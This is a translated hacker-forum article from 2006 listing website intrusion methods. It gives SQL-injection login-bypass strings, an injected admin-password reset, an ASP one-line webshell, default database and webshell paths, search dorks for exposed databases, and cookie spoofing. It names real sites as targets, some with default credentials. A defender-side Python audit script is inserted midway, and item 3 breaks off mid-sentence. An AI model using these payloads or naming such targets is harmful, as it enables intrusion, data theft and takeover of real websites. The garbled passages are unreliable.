myhack58, Anonymous, MYHACK58:62200613031
History: Nov 27, 2006 - 12:00 a.m.

Hacker network intrusion: 14 methods that can be used - Vulnerability warning - Black Bar Safety Net

www.myhack58.com
1. Upload vulnerability [not covered here]

PS: If you see "Choose your file to upload [re-upload]" or a "please login" prompt, there is an 80% chance of a vulnerability!

Sometimes the upload does not succeed because the cookies are not the same. In that case, obtain the cookies with WSockExpert, then upload using DOMAIN.

2. Injection vulnerability [not covered here]

PS: About the MD5 password: sometimes it is not easy to crack. If the backend is a [SQL database], the following command can be used:

http://<injection URL>;update admin set password='new MD5 password' where password='old MD5 password'-- [admin is the table name.]

3. Side-site attack, that is, going across sites.

The site we want to break into may be solid and hard to attack. In that case we can find another site hosted on the same server, and then use that site, with privilege escalation, sniffing and other methods, to get into the site we actually want. There is one difficulty here: on some servers the absolute path is encrypted, it will see we’ve got a

4. Database disclosure ("storm library"): the / between two directories is replaced with %5c

Example: http://www.ahttc.edu.cn/otherweb … s.asp?BigClassName=mandate&BigClassType=1

If you see: 'E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa' is not a valid path. Determine that the path name is spelled correctly, and whether you are connected to the server where the file is stored.

This is the database. Download it with FlashGet and save it in .MDB format.

5. 'or'='or': this is a phrase that can be joined into the SQL statement. It can take you directly into the admin backend. I have collected a few similar ones:

’or’=’ " or “a”="a ’) or (’a’=’a ") or (“a”="a or 1=1-- ’ or ’a’=’a

6. Social engineering. We all know this one. It is just guessing.

Example: http://www.neu.edu.cn/waishi/admin

admin waishi

7. Writing to a database in ASP format. This means the one-line Trojan [<%execute request("value")%>], commonly used with guestbooks.

Example: http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp [this is a database in ASP format], and then write the one-line Trojan.

8. Source code: some websites run source code downloaded from the internet. Some webmasters are very inexperienced and do not change anything.

Example: http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

This site uses: Outstanding Alumni. I have the source.

Default database/webshell path: \database\liangu_data.mdb. Backend management: adm_login.asp. The password and username are both admin.

9. Use of default database/webshell paths: there are many such sites, or use other people's WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

Tools: Website Hunter, Mining Chicken

Example: http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10. Directory viewing method: on some sites the URL can be cut back to a directory, and the directory can then be accessed.

Example: http://www.ujs168.com/shop/admin/

http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

This way we can find the database. Downloading it I do not need to teach.
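
A defender-side check for items 4, 7, 9 and 10 above, as an added example that is not part of the original article: it walks a web document root and flags Access/Jet database files by their file header, whatever extension they carry, along with stray executables. The function names, finding labels and sample tree are constructed for illustration.

```python
import os
import tempfile

JET_MARKERS = (b"Standard Jet DB", b"Standard ACE DB")  # found at offset 4

def classify(path):
    """Return a finding label for one file, or None if nothing stands out."""
    with open(path, "rb") as fh:
        head = fh.read(32)
    ext = os.path.splitext(path)[1].lower()
    if head[4:19] in JET_MARKERS:
        # Content decides, not the name: a renamed database is still caught.
        return "database-as-asp" if ext == ".asp" else "database-in-webroot"
    if ext in (".mdb", ".accdb"):
        return "database-in-webroot"
    if head[:2] == b"MZ":
        return "executable-in-webroot"
    return None

def audit_webroot(root):
    """Walk root and return {relative_path: finding} for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            label = classify(full)
            if label:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = label
    return findings

def build_sample_webroot(root):
    """Write a constructed sample tree; names and contents are made up."""
    jet = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 12
    samples = {
        "bbs/data/forum.mdb": jet,
        "guestbook/db/book.asp": jet,
        "bbs/tool.exe": b"MZ\x90\x00" + b"\x00" * 28,
        "index.asp": b"<html>hello</html>",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webroot(tmp)
        for rel, label in sorted(audit_webroot(tmp).items()):
            print(f"{label:24} {rel}")
```

Any finding means the file is reachable by URL; the fix is to move data files outside the document root and turn off directory browsing.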

11. Tool overflow: .asp?NewsID= a /2j.asp?id=18 .asp?id= [this method can get a lot of WEBSHELLs]

12. Search engine use:

(1). inurl:flasher_list.asp default database: database/flash.mdb backend: /manager/

(2). Looking for website management background address:

site:xxxx.com intext:management

site:xxxx.com intitle:management <there are many keywords; find them yourself>

site:xxxx.com inurl:login

(3). Finding Access database, MSSQL and MySQL connection files

allinurl:bbs data

filetype:mdb inurl:database

filetype:inc conn

inurl:data filetype:mdb

I will not do these myself. Try them yourself.

13. COOKIE spoofing: change your own ID to the administrator's, and change the MD5 password to his as well. The COOKIES can be modified with the Guilin Veterans tool. I will not say more about this.

14. Use of common vulnerabilities: such as the Dvbbs ("dynamic network") BBS

Example: http://js1011.com/bbs/index.asp

You can start with the dvbbs privilege elevation tool, to make yourself a front-end administrator.

Then use the Dvbbs sticky-post ("solid top") tool: find a sticky post, then obtain the COOKIES. This you have to do yourself. We can use WSockExpert to obtain the Cookies / NC to send the packet.

I will not do this one. There are tutorials online; have a look yourself.

Tools: dvbbs privilege elevation tool, Dvbbs sticky-post tool

15. There are also some old vulnerabilities, such as viewing source code on IIS 3 and 4, and DELETE on IIS 5.

CGI and PHP also have some old holes, which I will not cover. They are too old and of little use.